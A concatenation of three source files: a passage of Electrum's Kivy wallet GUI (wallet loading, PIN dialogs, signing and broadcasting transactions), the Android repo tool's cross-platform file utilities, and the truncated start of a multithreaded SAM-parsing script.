PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if platform == 'android' and wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, invoice=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if invoice:
key = invoice['id']
txid = tx.txid()
self.wallet.set_label(txid, invoice['message'])
self.wallet.set_paid(key, txid)
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
    fcntl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
    def _create_stream(self, fd, dest, std_name):
        """ Creates a new stream wrapping an existing file descriptor.
        """
        raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
    # The queue is shared across all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
    # Return only one stream at a time, as it is the most straightforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
shutil.rmtree(_makelongpath(path), onerror=handle_rmtree_error)
else:
shutil.rmtree(path)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
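if __name__ == '__main__':
  # Minimal sketch, not part of the original module: shows one way the
  # FileDescriptorStreams abstraction could multiplex the stdout/stderr of a
  # child process. The command below is an arbitrary example and assumes a
  # Unix-like utility is available on PATH.
  import subprocess
  import sys

  proc = subprocess.Popen(['ls', '-l'],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  streams = FileDescriptorStreams.create()
  streams.add(proc.stdout, sys.stdout, 'stdout')
  streams.add(proc.stderr, sys.stderr, 'stderr')
  while not streams.is_done:
    for stream in streams.select():
      data = stream.read()
      if not data:
        # EOF (or sentinel) reached on this stream: drop it.
        stream.close()
        streams.remove(stream)
      else:
        stream.dest.write(data.decode())
  proc.wait()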
|
parseSAM_MT.py
|
#!/usr/bin/python
import sys
import os
import threading
def GetPathAndName(pathfilename):
ls=pathfilename.split('/')
filename=ls[-1]
path='/'.join(ls[0:-1])+'/'
return path, filename
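# Illustrative invocation (file names and thread count below are hypothetical):
#   python parseSAM_MT.py regions.txt reads.sam 4 /usr/bin/python 100 8
# The script splits the reads file round-robin into one file per thread, runs
# parseSAM.py on each split in parallel, merges the per-thread outputs into
# refSeq_MLE_input.txt, and removes the temporary files.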
#Main**************************************************************************#
def main():
# Read input parameters
bin_path,command = GetPathAndName(sys.argv[0])
regions_filename = sys.argv[1]
reads_filename = sys.argv[2]
num_threads = int(sys.argv[3])
python_path = sys.argv[4]
read_len = sys.argv[5]
min_junction_overlap_len = sys.argv[6]
output_filename = 'refSeq_MLE_input.txt'
reads_file = open(reads_filename, 'r' )
reads_files = []
for thread_idx in range(num_threads):
reads_files.append(open(reads_filename + '.' + str(thread_idx), 'w'))
thread_idx = 0
for line in reads_file:
reads_files[thread_idx].write(line)
thread_idx = (thread_idx + 1) % num_threads
for thread_idx in range(num_threads):
